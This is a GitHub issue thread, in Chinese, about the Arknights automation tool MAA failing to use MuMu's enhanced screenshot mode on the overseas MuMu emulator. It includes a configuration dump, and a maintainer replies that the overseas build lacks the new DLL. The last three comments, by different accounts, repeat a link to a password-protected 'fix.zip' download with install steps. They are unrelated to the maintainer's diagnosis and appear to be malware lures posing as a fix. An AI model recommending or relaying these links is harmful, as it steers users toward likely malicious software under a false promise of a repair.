### ISSUE TITLE
mumu截图增强模式在mumu海外版应用无效

### ISSUE THREAD

**Issue by chenkeyu123** [MaaAssistantArknights/MaaAssistantArknights#10392]
### 在提问之前...

- [X] 我理解 Issue 是用于反馈和解决问题的，而非吐槽评论区，将尽可能提供更多信息帮助问题解决
- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 Issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我已查看最新测试版本的更新内容，并未提及该 Bug 已被修复的情况
- [X] 我已检查了置顶议题（Pinned Issue），确认我的问题未被提及

### 问题描述

我从mumu国内版切换到了海外版，此时按照app引导，填写了正确的mumu海外版文件地址，却无法正常识别mumu的截图，点击link start，显示出红字的未能识别mumu extra等字样后，maa自动暂停。
而当我关闭mumu截图增强模式时，maa可以正常识别截图并运行。

### Version

UI Version: v5.6.0-beta.1

### 日志和配置文件

[asst.log](https://github.com/user-attachments/files/16777177/asst.log)
[gui.log](https://github.com/user-attachments/files/16777180/gui.log)
[gui.json](https://github.com/user-attachments/files/16777182/gui.json)

### 配置信息

Basic information
UUID :  6b68468a-7ca8-44d0-9a00-8367277eed47
Player version :  3.8.18.2845
Emulator disk (available/total) space :  112.4GB/125GB
Log path :  C:\Program Files\Netease\MuMuPlayerGlobal-12.0\vms\MuMuPlayerGlobal-12.0-0\logs\

Operating environment
VT :  Enabled
Hyper-V :  Disabled
Network environment detection :  Normal
Run as administrator :  Yes
Is DirectX 11 installed? :  Yes
Firewall :  Disabled

Computer configuration
Motherboard Model :  Manufacturer: ASUSTeK COMPUTER INC.  Product: G733PZ
CPU :  AMD Ryzen 9 7945HX with Radeon Graphics
System version :  Windows 11 64-bit Kernel 10.0.22631
Graphics card driver :  Normal
Graphics card driver model :  32.0.15.6094 (20240814)
All graphics card :  NVIDIA GeForce RTX 4080 Laptop GPU  |  AMD Radeon(TM) 610M  |  Microsoft Basic Render Driver
Graphics card in used :  NVIDIA GeForce RTX 4080 Laptop GPU
Disk space (available/total) for installation :  295GB/928.5GB
Available memory/Total memory :  15.7GB/31.2GB

Emulator settings
Root :  Disabled
Graphics card rendering mode :  DirectX Mode
Performance setting :  6Core/9GB
Mobile model :  Samsung Galaxy S20 FE
Resolution :  2560 * 1440
High frame rate :  Enabled
Keep alive in background :  Disabled

Connected device
Audio input :  Connected
Audio output :  Connected

Network information
MuMu DNS :  198.18.0.2
Computer DNS :  198.18.0.2
Rom MAC address :  08:71:f3:ef:10:00

Adb debug port :  16384
MuMu export IP address :  10.0.2.15
Computer export IP address :  38.150.8.26

Other information
Other version information :  vm: 120.1.60.003 hyperv: 6.3.27.0 renderer: 0.0.169.0
Vendor :  NetEase
OpenGL Renderer :  MuMu GL (NVIDIA GeForce RTX 4080 Laptop GPU Direct3D11 vs_5_0 ps_5_0)
OpenGL Version :  OpenGL ES 3.1 V132
Run time :  0 : 44 : 53

截图增强和加速推理均开启，显卡型号为4080l

**Comment by ABA2396** [comment]
mumu停止了海外版维护，不带新dll，用不了

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
